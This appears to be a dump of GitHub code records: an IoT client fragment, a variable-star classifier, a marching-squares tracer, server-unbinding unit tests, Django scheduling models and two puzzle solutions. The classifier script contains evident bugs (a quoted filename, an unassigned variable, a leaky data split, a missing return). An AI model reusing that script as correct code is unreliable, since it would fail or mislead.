(y/n)\")\n if choice == \"y\":\n find_folder()\n \n else:\n print(\"command not recognized\")\n elif cmd == \"list\":\n print(os.listdir(\"/home/uniquare/Desktop/project/files_to_send\"))\n elif cmd == \"quit\":\n sys.exit(0)\n#If the user did not use our command line before she/he can type \"help\" that provide some description\n elif cmd == \"help\":\n helping()\n else:\n print(\"command not recognized\")","repo_name":"Sayed-Code/IoT_Project","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29091988444","text":"# +\n'''\nDefines the methods used for classification using the tsfresh\nextracted features as input (softmax and base neural network).\n'''\n\nimport sklearn\nfrom sklearn.preprocessing import LabelEncoder, Normalizer, OneHotEncoder, StandardScaler\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport pickle\nimport pandas as pd\n# -\n\nfrom tensorflow import keras\nimport tensorflow as tf\nfrom tensorflow.keras import layers, models, regularizers, metrics, optimizers\nfrom obtain_metrics import get_metrics, plot_confusion_matrix\n\ndef load_raw_data(x_data_file, y_data_file):\n '''\n Retrieves the data stored as pickle files.\n \n Params:\n - x_data_file: the pickle file containing the extracted features\n - y_data_file: the pickle file containing the labels\n '''\n x_data_raw = np.array(pd.read_pickle(x_data_file))\n with open('y_data_file', 'rb') as f:\n y_data_raw = np.array(pickle.load(f))\n \n return x_data_raw, y_data_raw\n\ndef preprocess(x_data, y_data, split=0.2, one_hot=True):\n '''\n Preprocesses the data by generating onehot encodings for the labels,\n splitting them into train/dev/test sets, and normalizing feature-wise.\n \n Params:\n - x_data: the feature-extracted data\n - y_data: the onehot-encoded labels\n - split: the fraction to split the data into (defaults to 60/20/20)\n \n Returns:\n - Tuples for the train/validation/test set.\n '''\n # Onehot encoding\n label_encoder = LabelEncoder()\n y_data = label_encoder.fit_transform(y_data)\n \n if (one_hot):\n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded = y_data.reshape(len(integer_encoded), 1)\n y_data = onehot_encoder.fit_transform(integer_encoded)\n\n # Split into train/dev/test sets\n x_train, x_test, y_train, y_test = train_test_split(x_data, y_data, test_size=split, random_state=0)\n x_train, x_val, y_train, y_val = train_test_split(x_data, y_data, test_size=(split / (1-split)), random_state=0)\n \n # Normalize feature-wise\n scaler = StandardScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n x_val = scaler.transform(x_val)\n \n return (x_train, y_train), (x_val, y_val), (x_test, y_test)\n\ndef softmax_classifier(train_data, test_data):\n '''\n Performs softmax classification on the training data and generates\n predictions on the testing data.\n \n Params:\n - train_data: tuple of the normalized feature-extracted data and onehot encoded labels (for training)\n - test_data: tuple of the normalized feature-extrated data and onhot encoded labels (for testing)\n \n Returns:\n - testing accuracy and predictions on the test set\n '''\n clf = sklearn.linear_model.LogisticRegression(class_weight='balanced', multi_class='multinomial', \n solver='lbfgs', max_iter=10000)\n \n x_train, y_train = train_data\n x_test, y_test = test_data\n clf.fit(x_train, np.ravel(y_train, order='C'))\n \n 
\ndef baseline_neural_network_model(num_features):\n    '''\n    Defines a 4 layer fully connected neural network.\n    \n    Params:\n    - num_features: the number of features extracted from tsfresh in the data\n    \n    Returns:\n    - Keras model object.\n    '''\n    X_input = layers.Input((num_features,))\n    X = layers.Dense(128, activation='relu', kernel_regularizer = regularizers.l2(0.01))(X_input)\n    X = layers.Dense(64, activation='relu')(X)\n    X = layers.Dense(32, activation='relu')(X)\n    X = layers.Dense(4, activation='softmax')(X)\n    model = models.Model(inputs = X_input, outputs=X, name='baseline')\n    return model\n\ndef fit_nn(train_data, val_data, test_data, epochs=15, batch_size=64):\n    '''\n    Compiles the model defined above and trains it on the training data.\n    Produces predictions on the testing data.\n    \n    Params:\n    - train_data: tuple of the x and y data for the training set\n    - val_data: tuple of the x and y data for the dev set\n    - test_data: tuple of the x and y data for the test set\n    \n    Returns:\n    - loss, accuracy, and predictions on the testing set\n    '''\n    x_train, y_train = train_data\n    x_val, y_val = val_data\n    x_test, y_test = test_data\n    \n    model = baseline_neural_network_model(x_train.shape[1])\n    model.compile(optimizer = optimizers.Adam(learning_rate=0.001), \n                  loss = 'categorical_crossentropy', metrics = ['accuracy'])\n    \n    model.fit(x_train, y_train, validation_data = (x_val, y_val),\n              epochs = epochs, batch_size=batch_size, shuffle=True)\n    \n    loss, acc = model.evaluate(x_test, y_test)\n    predictions = model.predict(x_test)\n    return loss, acc, predictions\n\nif __name__ == '__main__':\n    # Load raw data (post feature extraction with tsfresh)\n    extracted_features_file = '../data/feature_extraction/extracted_features_200'\n    y_labels = '../data/data_labels'\n    x_data_raw, y_data_raw = load_raw_data(extracted_features_file, y_labels)\n    \n    # Preprocess to normalize and split (softmax)\n    train_data_sm, _, test_data_sm = preprocess(x_data_raw, y_data_raw, one_hot=False)\n    \n    # Train and predict with softmax classifier\n    sm_acc, sm_predictions = softmax_classifier(train_data_sm, test_data_sm)\n    \n    # Compute precision/recall/confusion matrix\n    labels = ['eb', 'irreg', 'mira', 'rr']\n    print('Softmax Classifier:')\n    precision_sm, recall_sm, f1_sm = get_metrics(test_data_sm[1], sm_predictions, onehot_encoded=False)\n    print('Precisions: ' + str(precision_sm))\n    print('Recall: ' + str(recall_sm))\n    print('Average F1 Score: ' + str(f1_sm))\n    plot_confusion_matrix(test_data_sm[1], sm_predictions, labels, 'Softmax CM', onehot_encoded=False)\n    \n    # Preprocess to normalize and split (nn)\n    train_data_nn, val_data_nn, test_data_nn = preprocess(x_data_raw, y_data_raw)\n    \n    # Train and predict with nn\n    nn_loss, nn_acc, nn_predictions = fit_nn(train_data_nn, val_data_nn, test_data_nn)\n    \n    # Compute precision/recall/confusion matrix\n    print('Fully Connected Neural Network:')\n    precision_nn, recall_nn, f1_nn = get_metrics(test_data_nn[1], nn_predictions)\n    print('Precisions: ' + str(precision_nn))\n    print('Recall: ' + str(recall_nn))\n    print('Average F1 Score: ' + str(f1_nn))\n    plot_confusion_matrix(test_data_nn[1], nn_predictions, labels, 'FC Neural Network 
CM')\n","repo_name":"TirthDS/Variable_Star_Classification","sub_path":"Models/feature_extracted_models.py","file_name":"feature_extracted_models.py","file_ext":"py","file_size_in_byte":6581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9161950601","text":"#! /usr/bin/env python\n\"\"\"\nProvie a class which performs the marching squares algorithm on an image.\nThe desired output is a set of regions / contours.\n\"\"\"\n\nfrom copy import copy\nimport numpy as np\n\n__author__ = \"Paul Hancock\"\n\n\nclass MarchingSquares():\n \"\"\"\n Implementation of a marching squares algorithm. With reference to\n http://devblog.phillipspiess.com/2010/02/23/better-know-an-algorithm-1-marching-squares/\n but written in python\n \"\"\"\n\n NOWHERE = 0b0000\n UP = 0b0001\n DOWN = 0b0010\n LEFT = 0b0100\n RIGHT = 0b1000\n\n def __init__(self, data):\n self.prev = self.NOWHERE\n self.next = self.NOWHERE\n self.data = np.nan_to_num(data) # set all the nan values to be zero\n self.xsize, self.ysize = data.shape\n self.perimeter = self.do_march()\n return\n\n def find_start_point(self):\n \"\"\"\n Find the first location in our array that is not empty\n \"\"\"\n for i, row in enumerate(self.data):\n for j, _ in enumerate(row):\n if self.data[i, j] != 0: # or not np.isfinite(self.data[i,j]):\n return i, j\n\n def step(self, x, y):\n \"\"\"\n Move from the current location to the next\n\n Parameters\n ----------\n x, y : int\n The current location\n \"\"\"\n up_left = self.solid(x - 1, y - 1)\n up_right = self.solid(x, y - 1)\n down_left = self.solid(x - 1, y)\n down_right = self.solid(x, y)\n\n state = 0\n self.prev = self.next\n # which cells are filled?\n if up_left:\n state |= 1\n if up_right:\n state |= 2\n if down_left:\n state |= 4\n if down_right:\n state |= 8\n\n # what is the next step?\n if state in [1, 5, 13]:\n self.next = self.UP\n elif state in [2, 3, 7]:\n self.next = self.RIGHT\n elif state in [4, 12, 14]:\n self.next = self.LEFT\n elif state in [8, 10, 11]:\n self.next = self.DOWN\n elif state == 6:\n if self.prev == self.UP:\n self.next = self.LEFT\n else:\n self.next = self.RIGHT\n elif state == 9:\n if self.prev == self.RIGHT:\n self.next = self.UP\n else:\n self.next = self.DOWN\n else:\n self.next = self.NOWHERE\n return\n\n def solid(self, x, y):\n \"\"\"\n Determine whether the pixel x,y is nonzero\n\n Parameters\n ----------\n x, y : int\n The pixel of interest.\n\n Returns\n -------\n solid : bool\n True if the pixel is not zero.\n \"\"\"\n if not(0 <= x < self.xsize) or not(0 <= y < self.ysize):\n return False\n if self.data[x, y] == 0:\n return False\n return True\n\n def walk_perimeter(self, startx, starty):\n \"\"\"\n Starting at a point on the perimeter of a region, 'walk' the perimeter\n to return to the starting point. Record the path taken.\n\n Parameters\n ----------\n startx, starty : int\n The starting location. Assumed to be on the perimeter of a region.\n\n Returns\n -------\n perimeter : list\n A list of pixel coordinates [ [x1,y1], ...] 
that constitute the\n perimeter of the region.\n \"\"\"\n # checks\n startx = max(startx, 0)\n startx = min(startx, self.xsize)\n starty = max(starty, 0)\n starty = min(starty, self.ysize)\n\n points = []\n\n x, y = startx, starty\n\n while True:\n self.step(x, y)\n if 0 <= x <= self.xsize and 0 <= y <= self.ysize:\n points.append((x, y))\n if self.next == self.UP:\n y -= 1\n elif self.next == self.LEFT:\n x -= 1\n elif self.next == self.DOWN:\n y += 1\n elif self.next == self.RIGHT:\n x += 1\n # stop if we meet some kind of error\n elif self.next == self.NOWHERE:\n break\n # stop when we return to the starting location\n if x == startx and y == starty:\n break\n return points\n\n def do_march(self):\n \"\"\"\n March about and trace the outline of our object\n\n Returns\n -------\n perimeter : list\n The pixels on the perimeter of the region [[x1, y1], ...]\n \"\"\"\n x, y = self.find_start_point()\n perimeter = self.walk_perimeter(x, y)\n return perimeter\n\n def _blank_within(self, perimeter):\n \"\"\"\n Blank all the pixels within the given perimeter.\n\n Parameters\n ----------\n perimeter : list\n The perimeter of the region.\n\n \"\"\"\n # Method:\n # scan around the perimeter filling 'up' from each pixel\n # stopping when we reach the other boundary\n for p in perimeter:\n # if we are on the edge of the data then there is nothing to fill\n if p[0] >= self.data.shape[0] or p[1] >= self.data.shape[1]:\n continue\n # if this pixel is blank then don't fill\n if self.data[p] == 0:\n continue\n\n # blank this pixel\n self.data[p] = 0\n\n # blank until we reach the other perimeter\n for i in range(p[1]+1, self.data.shape[1]):\n q = p[0], i\n # stop when we reach another part of the perimeter\n if q in perimeter:\n break\n # fill everything in between, even inclusions\n self.data[q] = 0\n\n return\n\n def do_march_all(self):\n \"\"\"\n Recursive march in the case that we have a fragmented shape.\n\n Returns\n -------\n perimeters : [perimeter1, ...]\n The perimeters of all the regions in the image.\n\n See Also\n --------\n :func:`AegeanTools.msq2.MarchingSquares.do_march`\n \"\"\"\n # copy the data since we are going to be modifying it\n data_copy = copy(self.data)\n\n # iterate through finding an island, creating a perimeter,\n # and then blanking the island\n perimeters = []\n p = self.find_start_point()\n while p is not None:\n x, y = p\n perim = self.walk_perimeter(x, y)\n perimeters.append(perim)\n self._blank_within(perim)\n p = self.find_start_point()\n\n # restore the data\n self.data = data_copy\n return perimeters\n","repo_name":"PaulHancock/Aegean","sub_path":"AegeanTools/msq2.py","file_name":"msq2.py","file_ext":"py","file_size_in_byte":6682,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"32273728506","text":"import unittest\n\nif __name__ == \"__main__\":\n import utils\n utils.import_depends()\n\nfrom brokertest import TestBrokerCommand\n\nSRV_MSG = \"WARNING: Server %s, is the last server bound to Service %s which still has clients\"\nSRVINST_MSG = \"WARNING: Server %s, is the last server bound to Service %s, instance %s which still has clients\"\n\n\nclass TestUnbindServer(TestBrokerCommand):\n\n def testcheckinitialplenary(self):\n # This test must use the same regular expressions as\n # testverifycatunittest02() does, to verify that the success of\n # searchclean() is not due to errors in the expressions\n command = [\"cat\", \"--hostname\", \"unittest02.one-nyp.ms.com\"]\n out = self.commandtest(command)\n 
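        # A hedged aside, not part of the original test file: searchoutput
        # amounts to asserting a re.search over the generated plenary text,
        # roughly:
        #
        #   import re
        #   assert re.search(r'/utsvc/[^/]+/server', out) is not None
        #
        # so the two checks below prove unittest02 starts out bound as a
        # server for both utsvc and dns before any unbind command runs.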
self.searchoutput(out, r'/utsvc/[^/]+/server', command)\n self.searchoutput(out, r'/dns/[^/]+/server', command)\n\n def testunbindutsi1unittest02(self):\n command = [\"unbind\", \"server\",\n \"--hostname\", \"unittest02.one-nyp.ms.com\",\n \"--service\", \"utsvc\", \"--all\"]\n\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n self.matchoutput(err,\n SRV_MSG % (\"unittest02.one-nyp.ms.com\", \"utsvc\"),\n command)\n\n def testunbinddns(self):\n self.noouttest([\"unbind\", \"server\",\n \"--hostname\", \"unittest02.one-nyp.ms.com\",\n \"--service\", \"dns\", \"--all\"])\n command = [\"unbind\", \"server\",\n \"--hostname\", \"nyaqd1.ms.com\",\n \"--service\", \"dns\", \"--all\"]\n\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n self.matchoutput(err,\n SRV_MSG % (\"nyaqd1.ms.com\", \"dns\"),\n command)\n\n # Should have already been unbound...\n # Hmm... this (as implemented) actually returns 0. Kind of a pointless\n # test case, at least for now.\n #def testrejectunbindutsi1unittest00(self):\n # self.badrequesttest([\"unbind\", \"server\",\n # \"--hostname\", \"unittest00.one-nyp.ms.com\",\n # \"--service\", \"utsvc\", \"--instance\", \"utsi1\"])\n\n def testverifycatutsi1(self):\n command = \"cat --service utsvc --instance utsi1\"\n out = self.commandtest(command.split(\" \"))\n self.matchoutput(out,\n \"structure template servicedata/utsvc/utsi1/config;\",\n command)\n self.matchoutput(out, 'include { \"servicedata/utsvc/config\" };',\n command)\n self.matchoutput(out, '\"instance\" = \"utsi1\";', command)\n self.searchoutput(out, r'\"servers\" = list\\(\\s*\\);', command)\n\n def testverifycatunittest02(self):\n command = [\"cat\", \"--hostname\", \"unittest02.one-nyp.ms.com\"]\n out = self.commandtest(command)\n self.searchclean(out, r'/utsvc/[^/]+/server', command)\n self.searchclean(out, r'/dns/[^/]+/server', command)\n\n def testverifybindutsi1(self):\n command = \"show service --service utsvc --instance utsi1\"\n out = self.commandtest(command.split(\" \"))\n self.matchclean(out, \"Server: unittest02.one-nyp.ms.com\", command)\n self.matchclean(out, \"Server: unittest00.one-nyp.ms.com\", command)\n\n def testunbindutsi2unittest00(self):\n command = [\"unbind\", \"server\",\n \"--hostname\", \"unittest00.one-nyp.ms.com\",\n \"--service\", \"utsvc\", \"--instance\", \"utsi2\"]\n\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n self.matchoutput(err,\n SRVINST_MSG % (\"unittest00.one-nyp.ms.com\", \"utsvc\", \"utsi2\"),\n command)\n\n def testverifycatutsi2(self):\n command = \"cat --service utsvc --instance utsi2\"\n out = self.commandtest(command.split(\" \"))\n self.matchoutput(out,\n \"structure template servicedata/utsvc/utsi2/config;\",\n command)\n self.matchoutput(out, 'include { \"servicedata/utsvc/config\" };',\n command)\n self.matchoutput(out, '\"instance\" = \"utsi2\";', command)\n self.searchoutput(out, r'\"servers\" = list\\(\\s*\\);', command)\n\n def testverifybindutsi2(self):\n command = \"show service --service utsvc --instance utsi2\"\n out = self.commandtest(command.split(\" \"))\n self.matchclean(out, \"Server: unittest02.one-nyp.ms.com\", command)\n self.matchclean(out, \"Server: unittest00.one-nyp.ms.com\", command)\n\n def testunbindntp(self):\n command = [\"unbind\", \"server\",\n \"--hostname\", \"nyaqd1.ms.com\", \"--service\", \"ntp\", \"--all\"]\n\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n self.matchoutput(err,\n SRV_MSG % 
(\"nyaqd1.ms.com\", \"ntp\"),\n command)\n\n def testverifyunbindntp(self):\n command = \"show service --service ntp\"\n out = self.commandtest(command.split(\" \"))\n self.matchclean(out, \"Server: nyaqd1.ms.com\", command)\n\n def testunbindaqd(self):\n command = [\"unbind\", \"server\",\n \"--hostname\", \"nyaqd1.ms.com\", \"--service\", \"aqd\", \"--all\"]\n\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n self.matchoutput(err,\n SRV_MSG % (\"nyaqd1.ms.com\", \"aqd\"),\n command)\n\n def testverifyunbindaqd(self):\n command = \"show service --service aqd\"\n out = self.commandtest(command.split(\" \"))\n self.matchclean(out, \"Server: nyaqd1.ms.com\", command)\n\n def testunbindlemon(self):\n command = [\"unbind\", \"server\", \"--hostname\", \"nyaqd1.ms.com\",\n \"--service\", \"lemon\", \"--all\"]\n\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n self.matchoutput(err,\n SRV_MSG % (\"nyaqd1.ms.com\", \"lemon\"),\n command)\n\n def testverifyunbindlemon(self):\n command = \"show service --service lemon\"\n out = self.commandtest(command.split(\" \"))\n self.matchclean(out, \"Server: nyaqd1.ms.com\", command)\n\n def testunbindsyslogng(self):\n command = [\"unbind\", \"server\", \"--hostname\", \"nyaqd1.ms.com\",\n \"--service\", \"syslogng\", \"--all\"]\n\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n self.matchoutput(err, SRV_MSG % (\"nyaqd1.ms.com\", \"syslogng\"),\n command)\n\n def testverifyunbindsyslogng(self):\n command = \"show service --service syslogng\"\n out = self.commandtest(command.split(\" \"))\n self.matchclean(out, \"Server: nyaqd1.ms.com\", command)\n\n def testunbindbootserver(self):\n command = [\"unbind_server\",\n \"--hostname=server9.aqd-unittest.ms.com\",\n \"--service=bootserver\", \"--all\"]\n\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n self.matchoutput(err,\n SRV_MSG % (\"server9.aqd-unittest.ms.com\", \"bootserver\"),\n command)\n\n def testverifyunbindbootserver(self):\n command = \"show service --service bootserver\"\n out = self.commandtest(command.split(\" \"))\n self.matchclean(out, \"Server: server9.aqd-unittest.ms.com\", command)\n\n def testunbindchooser(self):\n for service in [\"chooser1\", \"chooser2\", \"chooser3\"]:\n for (s, n) in [(1, 'a'), (2, 'b'), (3, 'c')]:\n if service == 'chooser2' and n == 'b':\n continue\n if service == 'chooser3' and n == 'c':\n continue\n server = \"server%d.aqd-unittest.ms.com\" % s\n instance = \"ut.%s\" % n\n command = [\"unbind\", \"server\", \"--hostname\", server,\n \"--service\", service, \"--instance\", instance]\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n def testunbindpollhelper(self):\n service = self.config.get(\"broker\", \"poll_helper_service\")\n self.successtest([\"unbind\", \"server\", \"--hostname\", \"nyaqd1.ms.com\",\n \"--service\", service, \"--instance\", \"unittest\"])\n\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(TestUnbindServer)\n unittest.TextTestRunner(verbosity=2).run(suite)\n","repo_name":"gombasg/aquilon","sub_path":"tests/broker/test_unbind_server.py","file_name":"test_unbind_server.py","file_ext":"py","file_size_in_byte":8554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"23467940941","text":"import sys\n\nf = open(sys.argv[1])\nf2 = open('res.text', \"w\")\n\n\n\nfor i in range(int(f.readline().strip())):\n\tN = 
f.readline()\n\tarr = list(map(int, f.readline().strip().split(\" \")))  # list() so the values can be indexed under Python 3\n\tsum_diff = 0\n\tmin_diff = 0\n\tfor index, num in enumerate(arr[1:]):\n\t\tsum_diff -= min(0, num - arr[index])\n\t\tmin_diff = min(min_diff, num - arr[index])\n\tcrate = 0\n\tfor num in arr[:-1]:\n\t\tcrate += min(-min_diff, num)\n\n\tf2.write(\"Case #{n}: {a} {b}\\n\".format(a=sum_diff, b=crate, n=i+1))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_159/515.py","file_name":"515.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14735210958","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.utils import timezone\nfrom django.contrib.auth.models import User\n# import oauth2client\nfrom oauth2client.contrib.django_orm import FlowField, CredentialsField\nimport datetime\n\n\n# Create your models here.\nclass Teacher(models.Model):\n\tteacher_id = models.AutoField(primary_key=True)\n\tnickname = models.CharField(max_length=200, unique=True)\n\n\tdef get_availability(self):\n\t\t#should remove .first after setting availability and teacher as onetoone\n\t\tavailability = self.availability_set.all().first()\n\t\treturn availability\n\n\tdef __unicode__(self):\n\t\treturn self.nickname\n\n\tdef get_skills(self):\n\t\tskills_list = [self.skill_1, self.skill_2, self.skill_3, self.skill_4, self.skill_5, self.skill_6, self.skill_7, self.skill_8, self.skill_9, self.skill_10, self.skill_11, self.skill_12, self.skill_13, self.skill_14, self.skill_15]\n\t\treturn skills_list\n\n\nclass Student(models.Model):\n\t##necessary for creation\n\tstudent_id = models.AutoField(primary_key=True)\n\tstudent_name = models.CharField(max_length=200, unique=True)\n\n\t#student's preferred teachers\n\tpreferred_teacher1 = models.ForeignKey(Teacher, on_delete=models.CASCADE, related_name='preferred1', blank=True, null=True)\n\tpreferred_teacher2 = models.ForeignKey(Teacher, on_delete=models.CASCADE, related_name='preferred2', blank=True, null=True)\n\tpreferred_teacher3 = models.ForeignKey(Teacher, on_delete=models.CASCADE, related_name='preferred3', blank=True, null=True)\n\n\t#student's rejected teachers\n\trejected_teacher1 = models.ForeignKey(Teacher, on_delete=models.CASCADE, related_name='rejected1', blank=True, null=True)\n\trejected_teacher2 = models.ForeignKey(Teacher, on_delete=models.CASCADE, related_name='rejected2', blank=True, null=True)\n\trejected_teacher3 = models.ForeignKey(Teacher, on_delete=models.CASCADE, related_name='rejected3', blank=True, null=True)\n\n\t#Student's requested dates\n\t# start_date = models.DateField('start date', blank=True)\n\t# start_datetime = models.DateTimeField('start datetime', default=timezone.now)\n\t# end_date = models.DateField('end date', null=True, blank=True)\n\t# scheduled_hours = models.FloatField('scheduled hours', null=True, blank=True)\n\t#Student's schedule: available start, available end, max duration\n\n\t#print student nickname\n\tdef __repr__(self):\n\t\treturn '<Student: %s>' % (self.student_name)\n\n\tdef __unicode__(self):\n\t\treturn self.student_name\n\n\tdef get_skills(self):\n\t\tskills_list = [self.skill_1, self.skill_2, self.skill_3, self.skill_4, self.skill_5, self.skill_6, self.skill_7, self.skill_8, self.skill_9, self.skill_10, self.skill_11, self.skill_12, self.skill_13, self.skill_14, self.skill_15]\n\t\treturn skills_list\n
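A hedged sketch, not part of the original file: the Event model defined just below stores start/end datetimes plus a separate duration float, and the two can drift apart; one way to keep them consistent is a save() override on Event, for example:

	# hypothetical method body; it would live inside the Event class below
	def save(self, *args, **kwargs):
		# derive duration (in hours) from the two datetime fields
		delta = self.end_datetime - self.start_datetime
		self.duration = delta.total_seconds() / 3600.0
		super(Event, self).save(*args, **kwargs)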
\nclass Event(models.Model):\n\tevent_id = models.AutoField(primary_key=True)\n\tstart_datetime = models.DateTimeField('Start Date', default=timezone.now)\n\tend_datetime = models.DateTimeField('End Date', default=timezone.now)\n\tduration = models.FloatField(default=0)\n\tteacher = models.ForeignKey(Teacher, on_delete=models.CASCADE, default=-1)\n\tstudent = models.ForeignKey(Student, on_delete=models.CASCADE, default=-1)\n\tnotes = models.CharField(max_length=200)\n\n\n\tdef __repr__(self):\n\t\treturn '<Event: teacher=%s, student=%s, start=%s>' % (self.teacher, self.student, self.start_datetime)\n\n\tdef __unicode__(self):\n\t\treturn 'Teacher: %s, Student: %s, Start: %s' % (self.teacher, self.student, self.start_datetime)\n\n\n\n#skills table. choose either teacher or event for foreign key\nclass Skill(models.Model):\n\t##ACT\n\t#English\n\tskill_1 = models.BooleanField('ACT English', default=False)\n\t#Math\n\tskill_2 = models.BooleanField('ACT Math', default=False)\n\t#Reading\n\tskill_3 = models.BooleanField('ACT Reading', default=False)\n\t#Science\n\tskill_4 = models.BooleanField('ACT Science', default=False)\n\t#Writing\n\tskill_5 = models.BooleanField('ACT Writing', default=False)\n\t##Floor\n\t#ELA\n\tskill_6 = models.BooleanField('Floor ELA', default=False)\n\t#Math\n\tskill_7 = models.BooleanField('Floor Math', default=False)\n\t##Subject Tutoring\n\t#Pre-Calc\n\tskill_8 = models.BooleanField('Pre-Calculus', default=False)\n\t#Calc\n\tskill_9 = models.BooleanField('Calculus', default=False)\n\t#Biology\n\tskill_10 = models.BooleanField('Biology', default=False)\n\t#Chemistry\n\tskill_11 = models.BooleanField('Chemistry', default=False)\n\t#Physics\n\tskill_12 = models.BooleanField('Physics', default=False)\n\t#Earth/Space\n\tskill_13 = models.BooleanField('Earth/Space', default=False)\n\t#History\n\tskill_14 = models.BooleanField('History', default=False)\n\t#Spanish\n\tskill_15 = models.BooleanField('Spanish', default=False)\n\n\tevent = models.ForeignKey(Event, on_delete=models.CASCADE, null=True, blank=True)\n\tteacher = models.ForeignKey(Teacher, on_delete=models.CASCADE, null=True, blank=True)\t\n\n\tdef skillsArray(self):\n\t\tskills = [self.skill_1, self.skill_2, self.skill_3, self.skill_4, self.skill_5, self.skill_6, self.skill_7, self.skill_8, self.skill_9, \n\t\t\tself.skill_10, self.skill_11, self.skill_12, self.skill_13, self.skill_14, self.skill_15]\n\t\treturn skills\n\n\tdef __unicode__(self):\n\t\treturn 'Skills: %s' % (self.skillsArray())\n\nclass Availability(models.Model):\n\t#Teacher's schedule: available start, available end, max duration(default=end-start)\n\tmonday_start = models.TimeField('monday start', null=True, blank=True)\n\tmonday_end = models.TimeField('monday end', null=True, blank=True)\n\tmonday_duration = models.FloatField(default=0)\n\ttuesday_start = models.TimeField('tuesday start', null=True, blank=True)\n\ttuesday_end = models.TimeField('tuesday end', null=True, blank=True)\n\ttuesday_duration = models.FloatField(default=0)\n\twednesday_start = models.TimeField('wednesday start', null=True, blank=True)\n\twednesday_end = models.TimeField('wednesday end', null=True, blank=True)\n\twednesday_duration = models.FloatField(default=0)\n\tthursday_start = models.TimeField('thursday start', null=True, blank=True)\n\tthursday_end = models.TimeField('thursday end', null=True, blank=True)\n\tthursday_duration = models.FloatField(default=0)\n\tfriday_start = models.TimeField('friday start', null=True, blank=True)\n\tfriday_end = models.TimeField('friday end', null=True, blank=True)\n\tfriday_duration = 
models.FloatField(default=0)\n\tsaturday_start = models.TimeField('saturday start', null=True, blank=True)\n\tsaturday_end = models.TimeField('saturday end', null=True, blank=True)\n\tsaturday_duration = models.FloatField(default=0)\n\tsunday_start = models.TimeField('sunday start', null=True, blank=True)\n\tsunday_end = models.TimeField('sunday end', null=True, blank=True)\n\tsunday_duration = models.FloatField(default=0)\n\n\tteacher = models.ForeignKey(Teacher, on_delete=models.CASCADE)\n\nclass FlowModel(models.Model):\n\tid = models.OneToOneField(User, primary_key=True)\n\tflow = FlowField()\n\nclass CredentialsModel(models.Model):\n\tid = models.OneToOneField(User, primary_key=True)\n\tcredential = CredentialsField()\n\nclass ClientSecret(models.Model):\n\tSOCIAL_AUTH_GOOGLE_OAUTH2_KEY = models.CharField(max_length=200)\n\tSOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = models.CharField(max_length=50)\n\tSOCIAL_AUTH_GOOGLE_SCOPE1 = models.TextField()\n\tSOCIAL_AUTH_GOOGLE_SCOPE2 = models.TextField()\n\tSOCIAL_AUTH_LOGIN_REDIRECT_URL = models.CharField(max_length=50)\n\tSOCIAL_AUTH_LOGIN_URL = models.CharField(max_length=50)","repo_name":"Zenonquest/schedule","sub_path":"scheduler/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5846095136","text":"\"\"\"\n\nBy replacing the 1st digit of *3, it turns out that six of the nine possible values:\n13, 23, 43, 53, 73, and 83, are all prime.\n\nBy replacing the 3rd and 4th digits of 56**3 with the same digit, this 5-digits number is the first example\nhaving seven primes among the ten generated numbers, yielding the family:\n56003, 56113, 56333, 56443, 56663, 56773, and 56993.\nConsequently 5603, being the first member of this family, is the smallest prime with this property.\n\nFind the smallest N-digits prime which, by replacing K-digits of the number (not necessarily adjacent digits)\nwith the same digit, is part of an L prime value family.\n\nNote1: It is guaranteed that solution does exist.\nNote2: Leading zeros should not be considered.\nNote3: If there are several solutions, choose the \"lexicographically\" smallest one\n(one sequence is considered \"lexicographically\" smaller than another if its first element which does not match\nthe corresponding element in another sequence is smaller)\n\n\"\"\"\nimport functools\nimport itertools\nfrom bisect import bisect_left, bisect_right\n\n\ndef eratosthenes_sieve(n):\n \"\"\"Return primes <= n.\"\"\"\n\n def add_prime(k):\n \"\"\"Add founded prime.\"\"\"\n primes.append(k)\n pos = k + k\n while pos <= n:\n numbers[pos] = 1\n pos += k\n\n numbers = [0] * (n + 1)\n primes = [2]\n for i in range(3, n + 1, 2):\n if not numbers[i]:\n add_prime(i)\n return primes\n\n\ndef is_prime(primes, n):\n \"\"\"Check if number is prime.\"\"\"\n pos = bisect_left(primes, n)\n if pos < len(primes): # n is in primes\n if primes[pos] == n:\n return True\n return False\n\n\ndef gen_patterns(n, k):\n \"\"\"Build patterns for digits(n) and substitutions (*)\"\"\"\n pattern = 'd' * (n - k) + '*' * k\n founded = set()\n patterns = []\n for composition in itertools.permutations(pattern, n):\n if composition not in founded:\n founded.add(composition)\n digits_at = [i for i, ch in enumerate(composition) if ch == '*']\n patterns.append(digits_at)\n return patterns\n\n\ndef find_sequence(candidates, patterns, n, k, l):\n \"\"\"Find reqired primes sequence from candidate list.\"\"\"\n result = [10 
